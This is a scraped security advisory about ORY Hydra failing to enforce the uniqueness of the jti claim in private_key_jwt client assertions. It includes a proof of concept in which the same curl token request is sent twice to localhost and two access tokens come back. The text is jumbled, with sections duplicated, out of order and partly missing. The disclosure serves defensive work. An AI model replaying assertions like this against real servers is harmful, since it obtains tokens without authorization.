When using client authentication method "private_key_jwt" [1], OpenId specification says the following about assertion jti
:
$ curl --insecure --location --request POST 'https://localhost/_/oauth2/token' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'grant_type=client_credentials' \
--data-urlencode 'client_id=c001d00d-5ecc-beef-ca4e-b00b1e54a111' \
--data-urlencode 'scope=application openid' \
--data-urlencode 'client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer' \
--data-urlencode 'client_assertion=eyJhb [...] jTw'
{"access_token":"zeG0NoqOtlACl8q5J6A-TIsNegQRRUzqLZaYrQtoBZQ.VR6iUcJQYp3u_j7pwvL7YtPqGhtyQe5OhnBE2KCp5pM","expires_in":3599,"scope":"application openid","token_type":"bearer"}⏎ ~$ curl --insecure --location --request POST 'https://localhost/_/oauth2/token' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'grant_type=client_credentials' \
--data-urlencode 'client_id=c001d00d-5ecc-beef-ca4e-b00b1e54a111' \
--data-urlencode 'scope=application openid' \
--data-urlencode 'client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer' \
--data-urlencode 'client_assertion=eyJhb [...] jTw'
{"access_token":"wOYtgCLxLXlELORrwZlmeiqqMQ4kRzV-STU2_Sollas.mwlQGCZWXN7G2IoegUe1P0Vw5iGoKrkOzOaplhMSjm4","expires_in":3599,"scope":"application openid","token_type":"bearer"}
We rate the severity as medium because the following reasons make it hard to replay tokens without the patch:�
Impact
When using client authentication method "private_key_jwt" [1], OpenId specification says the following about assertion
jti
:Hydra does not seem to check the uniqueness of this
jti
value. Here is me sending the same token request twice, hence with the samejti
assertion, and getting two access tokens:Severity
We rate the severity as medium because the following reasons make it hard to replay tokens without the patch:�
Patches
This will be patched with v1.4.0+oryOS.17
Workarounds
Two workarounds have been identified:
private_key_jwt
References
https://openid.net/specs/openid-connect-core-1_0.html#ClientAuthentication
Upstream
This issue will be resolved in the upstream repository https://github.com/ory/fosite